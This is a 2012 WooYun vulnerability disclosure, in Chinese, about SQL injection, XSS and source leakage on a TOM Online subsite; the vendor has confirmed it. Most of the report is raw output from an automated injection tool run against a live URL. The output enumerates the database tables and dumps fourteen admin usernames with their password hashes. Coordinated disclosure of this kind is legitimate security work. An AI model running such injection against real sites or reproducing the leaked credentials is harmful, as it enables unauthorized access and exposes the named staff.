当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-07621

漏洞标题:TOM某站sql及整站xss等集合!!

相关厂商:TOM在线

漏洞作者: zeracker

提交时间:2012-05-28 23:22

修复时间:2012-07-12 23:23

公开时间:2012-07-12 23:23

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-05-28: 细节已通知厂商并且等待厂商处理中
2012-05-29: 厂商已经确认,细节仅向厂商公开
2012-06-08: 细节向核心白帽子及相关领域专家公开
2012-06-18: 细节向普通白帽子公开
2012-06-28: 细节向实习白帽子公开
2012-07-12: 细节向公众公开

简要描述:

sql注入
整站xss
源码泄露
等。。。

详细说明:

http://dgbest.tom.com/article.php?id=33500 注入
Analyzing http://dgbest.tom.com/article.php?
id=33500
Host IP: 202.108.13.17
Web Server: Apache/2.2.8 (Fedora)
Powered-by: PHP/5.2.5
Keyword Found: 2
Injection type is String (')
DB Server: MySQL >=5
Selected Column Count is 13
Injection type is String (')
Valid String Column is 10
Current DB: dgbest
Count(table_name) of information_schema.tables 
where table_schema=0x646762657374 is 41
Tables found: 
dg_comments,dg_index_home,dg_links,dg_ngg_album,dg_
ngg_gallery,dg_ngg_pictures,dg_options,dg_postmeta,
dg_posts,dg_term_relationships,dg_term_taxonomy,dg_
terms,dg_usermeta,dg_users,dgbest_acl,dgbest_ad,dgb
est_ad_position,dgbest_ad_record,dgbest_admin,dgbes
t_application,dgbest_ding,dgbest_ezine,dgbest_ezine
_content,dgbest_ezine_flash,dgbest_ezine_read,dgbes
t_focus,dgbest_gallery,dgbest_gallery_pic,dgbest_li
nks,dgbest_manual_update,dgbest_recommend_category,
dgbest_recommend_editor,dgbest_recommend_product,dg
best_recommend_relation,dgbest_recommend_topic,dgbe
st_right,dgbest_score,dgbest_special,dgbest_timelin
e,dgbest_tomad,dgbest_vote
Count(column_name) of information_schema.columns 
where table_schema=0x646762657374 and 
table_name=0x6467626573745F61646D696E is 3
Columns found: id,user_login,user_pass
Count(*) of dgbest.dgbest_admin is 14
Data Found: id=1
Data Found: user_login=admin
Data Found: 
user_pass=bfe5e7ac5b9f32f17946ac00ac6f0123
Data Found: id=2
Data Found: user_login=yangming
Data Found: 
user_pass=91a65eaef41f964d3524479310245b33
Data Found: id=3
Data Found: user_login=wangyingxin
Error (10060): The attempt to connect timed out
Turning off 'bypass illegal union' and retrying!
Data Found: 
user_pass=628222ffbf2626ac9d8bcea148d55005
Data Found: id=4
Data Found: user_login=dujie
Data Found: 
user_pass=ca7e85cdc89307977dfc51ff97304857
Data Found: id=5
Data Found: user_login=liangdong
Data Found: 
user_pass=6cc1c13284d5fee2f9259d0ee645aebd
Data Found: id=6
Data Found: user_login=lixiaochen
Data Found: 
user_pass=b01909722fa963b9511b6821a2c96e25
Data Found: id=7
Data Found: user_login=sunpeng
Data Found: 
user_pass=65579ea54311e21d32d15163a36ba7b6
Data Found: id=8
Data Found: user_login=wurong
Data Found: 
user_pass=cc1bf4721089b6ea8a5daa8c1263ece2
Data Found: id=9
Data Found: user_login=chenfang
Data Found: 
user_pass=54ab9bca0490effc30025fa7b3324991
Data Found: id=10
Data Found: user_login=lichao
Data Found: 
user_pass=a382cd40eaf65b6d98f0135e2fa3f016
Data Found: id=11
Data Found: user_login=zhaodandan
Data Found: 
user_pass=12acce7e5f6c89a80e0fe927f25f0105
Data Found: id=12
Data Found: user_login=haopeng
Data Found: 
user_pass=3bc9581877e315150ceeddca46623ec6
Data Found: id=13
Data Found: user_login=dongmingchao
Data Found: 
user_pass=7af12d9b872068e01e7c6882ae146e14
Data Found: id=14
Data Found: user_login=captain
Data Found: 
user_pass=ab334feeb31c05124cb73fa12571c2f6



XSS 整理麻烦。

漏洞证明:


修复方案:

加强安全体系。
你们懂的。
QQ2036234

版权声明:转载请注明来源 zeracker@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2012-05-29 09:52

厂商回复:

谢谢

最新状态:

暂无